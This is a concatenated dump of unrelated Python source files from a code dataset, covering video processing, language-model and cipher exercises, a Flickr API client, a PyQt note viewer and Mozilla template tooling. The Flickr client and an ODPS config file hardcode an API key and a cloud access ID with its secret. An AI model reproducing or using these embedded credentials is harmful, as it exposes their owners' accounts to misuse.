x","sub_path":"mathematical_computation101/code/gauss_elimination.py","file_name":"gauss_elimination.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"603065342","text":"\"\"\"\n%% Process video file\nfunction output = processVideoFile(filename, featureDesc, computeBool)\n\n Methods:\n readFrame - Read the next available frame from a video file.\n hasFrame - Determine if there is a frame available to read\n from a video file.\n getFileFormats - List of known supported video file formats.\n\n Properties:\n Name - Name of the file to be read.\n Path - Path of the file to be read.\n Duration - Total length of file in seconds.\n CurrentTime - Location from the start of the file of the current\n frame to be read in seconds.\n Tag - Generic string for the user to set.\n UserData - Generic field for any user-defined data.\n\n Height - Height of the video frame in pixels.\n Width - Width of the video frame in pixels.\n BitsPerPixel - Bits per pixel of the video data.\n VideoFormat - Video format as it is represented in MATLAB\n FrameRate - Frame rate of the video in frames per second.\n\"\"\"\n\n# Imports\nimport cv2\nimport 
processImage\nimport numpy as np\n\n\n# Read video file\nclass ReadVideoObject(object):\n    videoObj = None\n    videoObj_write = None\n\n    def __init__(self, filename, feature_desc, filename_write):\n        # Object Constructor\n        self.filename = filename\n        self.featureDesc = feature_desc\n        self.filename_write = filename_write\n        self.videoObj = cv2.VideoCapture(self.filename)\n        print(\"Video reader object created\")\n\n        # Read frames from the video object\n        # Loops until the user presses 'q'\n        self.read_frame()\n        # Release video object\n        self.videoObj.release()\n        # Destroy any open OpenCV windows (destroyAllWindows lives on the cv2 module, not the capture object)\n        cv2.destroyAllWindows()\n        print(\"Video reader object released\")\n        # ret, frame = videoObj.read()\n\n    def read_frame(self):\n        # Read frame\n        \"\"\"\n        while(self.videoObj.isOpened()):\n            ret, frame = self.videoObj.read()\n            gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n            cv2.imshow('frame', gray)\n        \"\"\"\n\n        while True:\n            # Capture frame-by-frame\n            ret, frame = self.videoObj.read()\n            # Our operations on the frame come here\n            gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n            gray_t = np.transpose(gray)\n\n            if self.filename_write is not None:\n                four_cc = 'DIV3'\n                fps = 30.0\n                frame_size = np.shape(gray_t)\n                color_bool = False\n                self.videoObj_write = WriteVideoObject(self.filename_write, four_cc, fps, frame_size, color_bool)\n\n            # Video writer\n            self.videoObj_write.write_obj(gray_t)\n\n            # Display the resulting frame\n            cv2.imshow('frame', frame)\n            if cv2.waitKey(1) & 0xFF == ord('q'):\n                break\n        self.videoObj_write.desc_obj()\n\n\n# Write video object\nclass WriteVideoObject:\n\n    # Object Constructor\n    def __init__(self, filename_write, four_cc, fps, frame_size, color_bool):\n        self.filename_write = filename_write\n        self.four_cc = cv2.VideoWriter_fourcc(*four_cc)\n        self.frame_size = frame_size\n        self.fps = fps\n        self.color_bool = color_bool\n\n        self.videoObj_write = cv2.VideoWriter(filename=self.filename_write, fourcc=self.four_cc,\n                                              fps=self.fps, frameSize=self.frame_size, isColor=self.color_bool)\n        print(\"Video writer object created\")\n\n    # Write frame to video object\n    def write_obj(self, frame):\n        self.videoObj_write.write(frame)\n        print(\"Video writer - writing frame to object\")\n\n    def desc_obj(self):\n        # Object Destructor\n        self.videoObj_write.release()\n        print(\"Video writer object released\")\n# End\n\n\n","sub_path":"FrameWork/Python/35/processVideoFile.py","file_name":"processVideoFile.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"13681028","text":"def intersect(t1 , t2): \n    result = () \n    for e in t1:\n        if e in t2:\n            result += (e,)\n    return result\n\ntub1 = (1 ,\"two\" , 3)\ntub2 = (tub1 , 3.25)\n\nprint(intersect(tub1, tub2))\nprint(tub1)\nprint(tub2)","sub_path":"PNotes/Tubles.py","file_name":"Tubles.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"506082241","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n    dependencies = [\n        ('resorts', '0023_auto_20151218_0446'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='resort',\n            name='datetime_format',\n            field=models.IntegerField(default=1, blank=True,\n                                      choices=[(0, b'mm/dd/yyyy hh:mm:ss'), (1, b'dd/mm/yyyy hh:mm:ss')]),\n        ),
]\n","sub_path":"project/apps/resorts/migrations/0024_resort_datetime_format.py","file_name":"0024_resort_datetime_format.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"472795424","text":"import sys\nimport collections\nimport math\n\n\nSTATUS = 'train'\nPATH = '/Users/zz_zhang/勉強会/NLPチュートリアル/NLPtutorial2020/test/'\nINPUT_FILE_NAME = '01-train-input.txt'\nANSWER_FILE_NAME = '01-train-answer.txt'\nMODEL_FILE_NAME = 'tutorial01.model'\nLAMBDA_1 = 0.95\nLAMBDA_UNK = 1 - LAMBDA_1\nV = 1000000\nW = 0\nH = 0\n\ndef train_unigram(train_file):\n\n gram_counter = collections.Counter()\n total_length = 0\n for line in train_file:\n temp = line.replace('\\n', '').split(' ') + ['
    ']\n gram_counter.update(temp)\n total_length += len(temp)\n # print(total_counter, gram_counter)\n gram_counter = dict(sorted(gram_counter.items()))\n\n with open(MODEL_FILE_NAME, 'w') as model_file:\n res = ''\n for word, count in gram_counter.items():\n temp = word + ' ' + str(float(count) / total_length) + '\\n'\n res += temp\n model_file.write(temp)\n\n print('Model training finished, written in {}.'.format(MODEL_FILE_NAME))\n return res\n print('Model training failed.')\n return -1\n\n\ndef test_unigram(test_file):\n with open(MODEL_FILE_NAME) as model_file:\n model = {}\n for line in model_file:\n temp = line.replace('\\n', '').split(' ')\n model[temp[0]] = float(temp[-1])\n model = collections.Counter(model)\n\n entropy = 0.0\n coverage = 0.0\n total_length = 0\n for line in test_file:\n words = line.replace('\\n', '').split(' ') + ['']\n total_length += len(words)\n\n # calc entropy\n for word in words:\n p = LAMBDA_1 * model[word] + LAMBDA_UNK / V\n entropy -= math.log(p, 2)\n\n coverage += 1 if model[word] > 0 else 0\n\n entropy /= total_length\n coverage /= total_length\n # print(entropy, coverage)\n return 'entropy = ' + str(entropy) + '\\n' + 'coverage = ' + str(coverage) + '\\n'\n\n\ndef test(result, answer):\n detla = 1e-5\n items_r = result.replace('\\n', ' ').split(' ')\n items_a = answer.replace('\\n', ' ').replace('\\t', ' ').split(' ')\n\n if len(items_a) != len(items_r):\n return False\n for item_r, item_a in zip(items_r, items_a):\n try:\n r = float(item_r)\n a = float(item_a)\n if abs(r - a) > detla:\n return False\n except:\n if item_r != item_a:\n return False\n return True\n\n\nif __name__ == '__main__':\n if len(sys.argv) >= 2:\n STATUS = sys.argv[1]\n\n # STATUS = 'test'\n print(STATUS, 'mode.')\n if STATUS == 'train':\n func = train_unigram\n else:\n func = test_unigram\n INPUT_FILE_NAME = '01-test-input.txt'\n ANSWER_FILE_NAME = '01-test-answer.txt'\n\n with open(PATH + INPUT_FILE_NAME) as file:\n res = func(file)\n\n ans = ''\n with open(PATH + ANSWER_FILE_NAME) as ans_file:\n for line in ans_file:\n if len(line) > 1 and '#' not in line:\n ans += line\n if test(res, ans):\n print('Accept')\n else:\n print('Wrong Answer')\n\n","sub_path":"zzz/tutorial01/tutorial01.py","file_name":"tutorial01.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"108099616","text":"import urllib.request, json\n\nSEARCH_URL = 'https://api.flickr.com/services/rest/?method=flickr.photos.search'\n\nAPI_PARAM = '&api_key='\nLAT_PARAM = '&lat='\nLON_PARAM = '&lon='\nPER_PAGE_PARAM = '&per_page='\nPAGE_PARAM = '&page='\nFORMAT_PARAM = '&format='\n\nAPI_KEY = 'b8b5ee365c39800a925944f298b44e92'\nPER_PAGE = '5'\nPAGE = '1'\nFORMAT = 'json'\n\n\n# This method is responsible to retrieve 5 photo ids\n# from flickr API and return it as an array of string.\n\n# latitude: the latitude of the user (String)\n# longitude: the longitude of the user (String)\n\n# returns: an array of string containing 5 ids of photos\n# nearby the given lat and lon.\n\ndef getPhotoId(latitude, longitude):\n # Build the url.\n url = SEARCH_URL + API_PARAM + API_KEY + LAT_PARAM + latitude + LON_PARAM + longitude + PER_PAGE_PARAM + PER_PAGE + PAGE_PARAM + PAGE + FORMAT_PARAM + FORMAT\n\n # Send a GET request to the url, and retrieve the JSON.\n # It is advised to print this variable in order to understand it better.\n retrieved = urllib.request.urlopen(url).read()\n\n # Strip the outer part of json, because it has a 
header that wraps the json.\n retrieved = retrieved[14:-1] # [14:-1] means that we perform a substring to the retrieved json\n # from index 14 (inclusive) to the last index (exclusive).\n # Read python substring docs for more info.\n\n\n # The actual retrieved json was just a string; therefore, it needs to be parsed into a real json.\n data = json.loads(retrieved)\n\n # Get the values of 'photos' from the json.\n # It is advised to print this variable in order to understand it better\n page = data['photos']\n\n # Get the array of photo from 'photos'.\n # It is advised to print this variable in order to understand it better\n photos = page['photo']\n\n # This for loop will get the id of each photo in the array,\n # and put it inside a new array named photo_id\n photo_id = []\n for photo in photos:\n photo_id.append(photo['id'])\n\n return photo_id\n","sub_path":"flickrcontroller.py","file_name":"flickrcontroller.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"364848462","text":"\"\"\"\nProblem: #1.7\n\nRotate Matrix: Given an image represented by an NxN matrix, where each pixel in the image is 4 \nbytes, write a method to rotate the image by 90 degrees. Can you do this in place?\n\"\"\"\ndef swap_rows(matrix):\n n = len(matrix)\n for i in range(n // 2):\n matrix[i], matrix[n - i - 1] = matrix[n - i - 1], matrix[i]\n return matrix\n\ndef transpose_matrix(matrix):\n n = len(matrix)\n for i in range(n):\n for j in range(i):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n return matrix\n\ndef rotate(matrix):\n return transpose_matrix(swap_rows(matrix))\n\nmatrix = [[11, 12, 13, 14], [21, 22, 23, 24], [31, 32, 33, 34], [41, 42, 43, 44]]\nprint(rotate(matrix))\n","sub_path":"arrays-and-strings/rotate-matrix.py","file_name":"rotate-matrix.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"293185305","text":"# !usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nfrom service import NoteService\nfrom model import Note\n\n\nclass ListWindow(QWidget):\n \"\"\"\n 查看用户列表/公开笔记列表/用户笔记列表的窗口\n \"\"\"\n ALLUSERSLIST = 0\n ALLNOTESLIST = 1\n MYNOTESLIST = 2\n def __init__(self, main_window, window_type = ALLUSERSLIST):\n super().__init__()\n self.main_window = main_window\n self.window_type = window_type\n self.initUI()\n\n \n def initUI(self):\n self.set_items() # 设置元件\n self.set_layout() # 设置布局\n \n def set_items(self):\n \"\"\"\n 设置一个按钮和一个文本框\n \"\"\"\n self.back_button = QPushButton('Back', self)\n self.back_button.setFixedSize(self.back_button.sizeHint())\n if self.window_type == self.ALLUSERSLIST:\n # 返回 ‘Note Manager’窗口\n self.back_button.clicked.connect(self.main_window.to_init_window)\n elif self.window_type == self.ALLNOTESLIST:\n # 返回 ‘Public Note’窗口\n self.back_button.clicked.connect(\n self.main_window.get_public_notes)\n else:\n # 返回 ‘My Note’窗口\n self.back_button.clicked.connect(\n self.main_window.deal_with_my_notes) \n self.text_browser = QTextBrowser()\n self.set_text()\n \n def set_layout(self):\n \"\"\" \n 设置布局 \n \"\"\"\n # 水平布局\n hbox = QHBoxLayout()\n hbox.addWidget(self.back_button, 0, Qt.AlignRight) # 使用了右对齐\n # 竖直布局\n vbox = QVBoxLayout()\n vbox.addWidget(self.text_browser, 0)\n # 竖直布局\n vbox1 = QVBoxLayout()\n vbox1.addLayout(hbox)\n vbox1.addLayout(vbox)\n \n 
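        # Install the composed layout: the Back-button row sits above the text browser.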
self.setLayout(vbox1)\n \n def set_text(self):\n \"\"\"\n 设置显示在文本框的内容\n \"\"\"\n self.__noteservice = NoteService()\n if self.window_type == self.ALLUSERSLIST:\n text = self.all_users_list()\n elif self.window_type == self.ALLNOTESLIST:\n text = self.all_notes_list()\n else:\n text = self.my_notes_list()\n self.text_browser.setText(text)\n \n def all_users_list(self):\n # 获得所有用户名\n user_names = self.__noteservice.list_all_users()\n for i, user_name in enumerate(user_names):\n user_names[i] = '{:^33}{:<30}'.format(str(i), user_name)\n \n return '\\n'.join(user_names)\n\n def all_notes_list(self):\n # 获得所有公开笔记\n notes = self.__noteservice.list_all_notes()\n for i, note in enumerate(notes):\n if note.get_note_permission() == Note.PUBLIC:\n note_permission = 'PUBLIC'\n else:\n note_permission = 'PRIVATE'\n # 序号 笔记名 权限 by 创建者\n notes[i] = '{:^10}{:<30}{:<15} by {:<20}'.format(str(i), \\\n note.get_note_name(), \\\n note_permission, \\\n note.get_user_name())\n return '\\n'.join(notes)\n\n def my_notes_list(self):\n # 获得用户所有笔记\n notes = self.__noteservice.list_notes_by_user(\n self.main_window.user_name)\n for i, note in enumerate(notes):\n if int(note[0]) == Note.PUBLIC:\n note_permission = 'PUBLIC'\n else:\n note_permission = 'PRIVATE'\n # 序号 笔记名 权限\n notes[i] = ' {:<20}{:<30}{:<25}'.format(str(i), note[1], \\\n note_permission)\n \n return '\\n'.join(notes)","sub_path":"task10GUI/src/NoteUI/list_window.py","file_name":"list_window.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"439827106","text":"#!/usr/bin/env python3\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n# This script can be used to Mozilla-fy Mercurial templates.\n\nimport pathlib\nimport shutil\nimport subprocess\nimport sys\n\n\nREMOVE_DIRS = {\n 'coal',\n 'monoblue',\n 'spartan',\n}\n\nREMOVE_FILES = {\n 'static/background.png',\n 'static/style-extra-coal.css',\n 'static/style-monoblue.css',\n}\n\nCOPY_FILES = {\n 'atom/pushlog.tmpl',\n 'atom/pushlogentry.tmpl',\n 'gitweb_mozilla/firefoxreleases.tmpl',\n 'gitweb_mozilla/pushlog.tmpl',\n 'gitweb_mozilla/repoinfo.tmpl',\n 'static/jquery-1.2.6.min.js',\n 'static/livemarks16.png',\n 'static/moz-logo-bw-rgb.svg',\n}\n\nREPLACEMENTS = [\n # Replace logo HTML.\n (b'\\nMercurial',\n b'\\n
    \\n'\n b' \\n'\n b' \"mercurial\"\\n'\n b' \\n'\n b'
    '),\n\n # Insert pushlog link in page header.\n (b'changelog |\\n',\n b'changelog |\\n'\n b'pushlog |\\n'),\n\n (b'changelog |\\n',\n b'changelog |\\n'\n b'pushlog |\\n'),\n]\n\n# Files in gitweb_mozilla where REPLACEMENTS should not apply.\nGITWEB_IGNORE_REPLACEMENTS = {\n 'firefoxreleases.tmpl',\n 'pushlog.tmpl',\n 'repoinfo.tmpl',\n}\n\n\ndef main(source_templates, vct_templates_path, new_templates_path):\n # source_templates is the canonical templates to start from.\n # vct_templates is hgtemplates/ from v-c-t.\n # new_templates_path is templates directory to write to. It could be\n # v-c-t's hgtemplates/.\n\n # vct_templates_path could be the same as new_templates_path and we\n # need to copy files from vct_templates path that may get removed below.\n # So make a copy of all files that may be nuked.\n backups = {}\n for f in COPY_FILES:\n p = vct_templates_path / f\n with p.open('rb') as fh:\n backups[f] = fh.read()\n\n # Ensure new_templates_path is empty.\n if new_templates_path.exists():\n # But take care not to nuke the .patches directory.\n if new_templates_path == vct_templates_path:\n for p in new_templates_path.iterdir():\n if p.name == '.patches':\n continue\n\n if p.is_dir():\n shutil.rmtree(p)\n else:\n p.unlink()\n else:\n shutil.rmtree(new_templates_path)\n\n new_templates_path.mkdir(parents=True, exist_ok=True)\n\n # Make a pristine copy from the canonical templates. In the case\n # where vct_templates_path == new_templates_path we can't simply\n # shutil.copytree() because the destination exists. So we copy everything\n # in the root directory separately.\n for p in source_templates.iterdir():\n if p.is_dir():\n shutil.copytree(p, new_templates_path / p.name)\n else:\n shutil.copyfile(p, new_templates_path / p.name)\n\n # Remove files and directories that we don't want.\n for d in sorted(REMOVE_DIRS):\n d = new_templates_path / d\n shutil.rmtree(d)\n\n for f in sorted(REMOVE_FILES):\n f = new_templates_path / f\n f.unlink()\n\n # Now nuke gitweb_mozilla and make a fresh copy from gitweb.\n gitweb_mozilla = new_templates_path / 'gitweb_mozilla'\n\n if gitweb_mozilla.exists():\n shutil.rmtree(gitweb_mozilla)\n\n shutil.copytree(new_templates_path / 'gitweb', gitweb_mozilla)\n\n # Create all new files.\n for f in sorted(COPY_FILES):\n dest = new_templates_path / f\n with dest.open('wb') as fh:\n fh.write(backups[f])\n\n # We need to track all files in the destination so `hg import` below works.\n # TODO we should perhaps be a bit more careful about committing in the case\n # where new_templates_path == vct_templates_path.\n subprocess.run(['hg', 'addremove', '.'],\n cwd=new_templates_path,\n check=True)\n subprocess.run(['hg', 'commit', '-m',\n 'hgtemplates: synchronize vanilla templates'])\n\n # Change the logo URL.\n for f in sorted(gitweb_mozilla.iterdir()):\n if f.suffix != '.tmpl':\n continue\n\n if f.name in GITWEB_IGNORE_REPLACEMENTS:\n continue\n\n with f.open('rb') as fh:\n s = fh.read()\n\n for search, replace in REPLACEMENTS:\n if search not in s:\n continue\n\n print('replacing %s... in %s' % (search[0:24], f))\n\n s = s.replace(search, replace)\n\n with f.open('wb') as fh:\n fh.write(s)\n\n print('committing automated transformations')\n subprocess.run(['hg', 'commit', '-m',\n 'hgtemplates: perform common rewrites'],\n cwd=new_templates_path,\n check=True)\n\n # Apply all our patches. The order of patches is defined by a series\n # file. 
Kinda like how MQ works.\n patch_dir = vct_templates_path / '.patches'\n series = patch_dir / 'series'\n\n with series.open('r') as fh:\n for line in fh:\n line = line.strip()\n if not line:\n continue\n\n patch_path = patch_dir / line\n\n with patch_path.open('rb') as fh:\n patch = fh.read()\n\n print('applying patch %s' % patch_path.name)\n sys.stdout.flush()\n\n subprocess.run(['hg', 'import', '-'],\n input=patch,\n cwd=new_templates_path.parent,\n check=True)\n sys.stderr.flush()\n sys.stdout.flush()\n\n\nif __name__ == '__main__':\n source_templates, vct_templates, new_templates = sys.argv[1:]\n\n main(pathlib.Path(source_templates),\n pathlib.Path(vct_templates),\n pathlib.Path(new_templates))\n","sub_path":"hgtemplates/.patches/mozify-templates.py","file_name":"mozify-templates.py","file_ext":"py","file_size_in_byte":6373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"170620502","text":"# Caesar encryption / decryption program\r\n# 21.11.2017, class exercise\r\n\r\n# Function that encrypts the given message\r\ndef sifrele(mesaj):\r\n sifrelimesaj=\"\"\r\n boy=len(mesaj)\r\n for i in range(boy): # for each letter in the message\r\n kod=ord(mesaj[i])\r\n kod=kod+3\r\n if kod>90: # the letters X,Y,Z must wrap to A,B,C\r\n kod=kod-26\r\n sifreliharf = chr(kod)\r\n if (mesaj[i]!=\" \"):\r\n sifrelimesaj=sifrelimesaj+sifreliharf\r\n else:\r\n sifrelimesaj=sifrelimesaj+\" \"\r\n\r\n return sifrelimesaj\r\n\r\n\r\n# Function that decrypts the given encrypted message\r\ndef sifreCoz(smesaj):\r\n duzmesaj=\"\"\r\n boy=len(smesaj)\r\n for i in range(boy): # for each letter in the message\r\n kod=ord(smesaj[i])\r\n kod=kod-3\r\n if kod<65: # the letters A,B,C must wrap to X,Y,Z\r\n kod=kod+26\r\n duzharf = chr(kod)\r\n if (smesaj[i]!=\" \"):\r\n duzmesaj=duzmesaj+duzharf\r\n else:\r\n duzmesaj=duzmesaj+\" \"\r\n\r\n return duzmesaj\r\n\r\n### MAIN PROGRAM\r\nm=input(\"Mesajınız: \")\r\nc=sifrele(m)\r\nprint(\"Mesajınızın Sifreli Kodu :\",c)\r\n\r\nm=input(\"sifreli Mesajı girin: \")\r\nc=sifreCoz(m)\r\nprint(\"Mesajınız :\",c)\r\n","sub_path":"10_Ceaser_sifreleme.py","file_name":"10_Ceaser_sifreleme.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"348747022","text":"import platform\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nrequirements = ['pyyaml']\ntests_require = ['mock']\n\n# Add Python 2.6 compatibility libraries\n(major, minor, rev) = platform.python_version_tuple()\nif float('%s.%s' % (major, minor)) < 2.7:\n requirements.append('argparse')\n requirements.append('logutils')\n tests_require.append('unittest2')\n\nsetup(name='helper',\n version='2.2.3',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Environment :: MacOS X',\n 'Environment :: No Input/Output (Daemon)',\n #'Environment :: Win32 (MS Windows)',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Operating System :: MacOS',\n #'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'Operating System :: POSIX :: BSD',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Unix',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python 
:: 3.3',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Programming Language :: Python :: Implementation :: PyPy',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules'],\n description=('Development library for quickly writing configurable '\n 'applications and daemons'),\n long_description=open('README.rst').read(),\n license=open('LICENSE').read(),\n author='Gavin M. Roy',\n author_email='gavinmroy@gmail.com',\n url='https://helper.readthedocs.org',\n packages=['helper'],\n package_data={'': ['LICENSE', 'README.rst']},\n install_requires=requirements,\n tests_require=tests_require,\n zip_safe=True)\n","sub_path":"build/helper/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"278173484","text":"# -*- coding: utf-8 -*-\n# auther:gaoshuai\n# 2019/1/8 下午5:29\n\n\n# odps配置\nproject_name = \"uxin_db_bc\"\naccess_id = \"LTAIywH3UrDpa17F\"\naccess_key = \"AAmVTXbSrkbEmu45si4LE4o0NQRCq6\"\nend_point = \"http://service.odps.aliyun.com/api\"\ntunnel_endpoint = \"http://dt.odps.aliyun.com\"\nlog_view_host = \"http://logview.odps.aliyun.com\"\nhttps_check = \"true\"\n","sub_path":"pyodps_vip_data/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"409761927","text":"from collections import deque\ndef max_of_subarray_of_k(arr,n,k):\n\n dq = deque()\n\n for i in range(k):\n\n while len(dq) >0 and arr[dq[-1]] < arr[i]:\n\n dq.pop()\n dq.append(i)\n\n for j in range(k,n):\n\n print(arr[dq[0]])\n\n while len(dq) > 0 and dq[0] <= j-k:\n dq.popleft()\n\n while len(dq) > 0 and arr[dq[-1]] < arr[j]:\n dq.pop()\n dq.append(j)\n\n print(arr[dq[0]])\n\nmax_of_subarray_of_k([20,40,30,10,60],5,3)\n","sub_path":"queues/max_of_subarray_of_k.py","file_name":"max_of_subarray_of_k.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"307728477","text":"import ROOT\nimport os\nimport sys\nfrom array import array\n\nMAXMUFRAC=0.5\n\ndef runJetAnalysis(t):\n \"\"\"fills histograms to determine prefiring probability\"\"\"\n\n jetPt=[30.0, 36.0, 43.0, 52.0, 63.0, 75.0, 91.0, 109.0, 131.0, 158.0, 190.0, 228.0, 274.0, 397.0, 574.0, 830.0, 1200.0]\n jetEta=[0, 1., 1.5, 2., 2.25, 2.5, 2.75, 3., 3.5]\n histos={\n 'njets' : ROOT.TH1D('njets',';Jet multiplicity;Events',10,0,10),\n 'jetpt' : ROOT.TH1D('jetpt',';Transverse momentum [GeV];Jets',len(jetPt)-1,array('d',jetPt)),\n 'jeteta' : ROOT.TH1D('jeteta',';Pseudo-rapidity;Jets',len(jetEta)-1,array('d',jetEta)),\n 'jetetapt' : ROOT.TH2D('jetpteta',';Pseudo-rapidity;Transverse momentum [GeV];Events',len(jetEta)-1,array('d',jetEta),len(jetPt)-1,array('d',jetPt)),\n 'jetetaphi' : ROOT.TH2D('jetetaphi',';Pseudo-rapidity;#phi [rad];Events',57, -3, 3, 72, -3.1415, 3.1415),\n 'jetemf' : ROOT.TH1D('jetemf',';e.m. 
fraction;Events',10,0,1),\n }\n for key in histos:\n histos[key].SetDirectory(0)\n histos[key].Sumw2()\n\n def fillHisto(val,name,cat=None):\n key='{0}_{1}'.format(cat,name) if cat else name\n if not key in histos:\n histos[key]=histos[name].Clone(key)\n histos[key].Reset('ICE')\n if isinstance(val,float) or isinstance(val,int):\n histos[key].Fill(val)\n else:\n histos[key].Fill(*val)\n\n for ientry in xrange(0,1000): #t.GetEntries()):\n t.GetEntry(ientry)\n #print ientry,'/',t.GetEntries()\n \n #select events\n hasHotSpotJet=False\n hasVeryFwdJet=True\n\n selJets=[]\n for j in xrange(0,t.jet_p4.size()):\n\n pdgid=t.jet_pdgid[j]\n if pdgid!=0: continue\n\n emfrac=t.jet_neutralEmFrac[j]\n mufrac=t.jet_muFrac[j]\n if mufrac>MAXMUFRAC : continue\n\n eta,phi=t.jet_p4[j].Eta(),t.jet_p4[j].Phi() \n #if t.run>=280919 and t.run<=284044:\n # if abs(eta+2.81)<0.2 and abs(phi-2.07)<0.2:\n # hasHotSpotJet=True\n\n p4=ROOT.TLorentzVector(t.jet_p4[j].Px(),t.jet_p4[j].Py(),t.jet_p4[j].Pz(),t.jet_p4[j].E())\n fillHisto(p4.Pt(), 'jetpt')\n fillHisto(abs(p4.Eta()), 'jeteta')\n fillHisto(p4.Pt(), 'jetpt')\n fillHisto([p4.Eta(),p4.Pt()], 'jetetapt')\n fillHisto([abs(p4.Eta()),p4.Phi()],'jetetaphi')\n fillHisto(emfrac, 'jetemf')\n if abs(eta)>=2:\n if abs(eta)<3.25 : selJets.append(p4)\n else : hasVeryFwdJet=True\n\n njets=len(selJets)\n fillHisto(njets,'njets')\n if njets==0 : continue \n\n for key in histos:\n histos[key].Draw()\n raw_input(key)\n\n\"\"\"\n #match to L1EG\n for ieg in xrange(0,t.L1EG_p4.size()):\n\n if t.L1EG_p4[ieg].Pt()<30: continue\n isIso=(t.L1EG_iso[ieg]&0x1)\n if not isIso: continue\n\n p4=ROOT.TLorentzVector(t.L1EG_p4[ieg].Px(),t.L1EG_p4[ieg].Py(),t.L1EG_p4[ieg].Pz(),t.L1EG_p4[ieg].E())\n for j in selJets:\n if p4.DeltaR(j)>0.4 : continue\n histos[\"jetmatchl1eg\"].fill(p4.Eta(),p4.Phi())\n\n\n\n if ( L1EG_p4[iEG].Pt() > 30. and (L1EG_iso[iEG] & 0x1) and DeltaR(L1EG_p4[iEG], jet) < 0.4 ) {\n match_bx |= bit(L1EG_bx[iEG]+2);\n if ( jet.Pt() > 30. and L1EG_bx[iEG] == -1 ) {\n hJet30EGEtaPhi_->Fill(L1EG_p4[iEG].Eta(), L1EG_p4[iEG].Phi(), jweight);\n }\n }\n if ( etaBinCut(jet) and L1EG_bx[iEG] == -1 and (L1EG_iso[iEG] & 0x1) ) {\n if ( DeltaR(L1EG_p4[iEG], jet) < 0.4 ) {\n if ( L1EG_p4[iEG].Pt() > 20. ) match_thr |= bit(0);\n if ( L1EG_p4[iEG].Pt() > 30. ) match_thr |= bit(1);\n if ( L1EG_p4[iEG].Pt() > 40. ) match_thr |= bit(2);\n }\n }\n if ( etaBinCut(jet) and (L1EG_iso[iEG] & 0x1) and L1EG_p4[iEG].Pt() > 20. 
) {\n if ( L1EG_bx[iEG] == -1 ) hJetEGdeltaR_bxm1_->Fill(DeltaR(L1EG_p4[iEG], jet), jweight);\n if ( L1EG_bx[iEG] == 0 ) hJetEGdeltaR_bx0_->Fill(DeltaR(L1EG_p4[iEG], jet), jweight);\n if ( L1EG_bx[iEG] == 1 ) hJetEGdeltaR_bx1_->Fill(DeltaR(L1EG_p4[iEG], jet), jweight);\n }\n }\n\n hJetPtEtaEGeffDenom_->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n if ( match_bx & bit(-2+2) ) hJetPtEtaEGeffNum_bxm2_->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n if ( match_bx & bit(-1+2) ) hJetPtEtaEGeffNum_bxm1_->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n if ( match_bx & bit( 0+2) ) hJetPtEtaEGeffNum_bx0_ ->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n if ( match_bx & bit( 1+2) ) hJetPtEtaEGeffNum_bx1_ ->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n if ( match_bx & bit( 2+2) ) hJetPtEtaEGeffNum_bx2_ ->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n\n if ( etaBinCut(jet) ) {\n hJetEGm1thrDenom_->Fill(jet.Pt(), 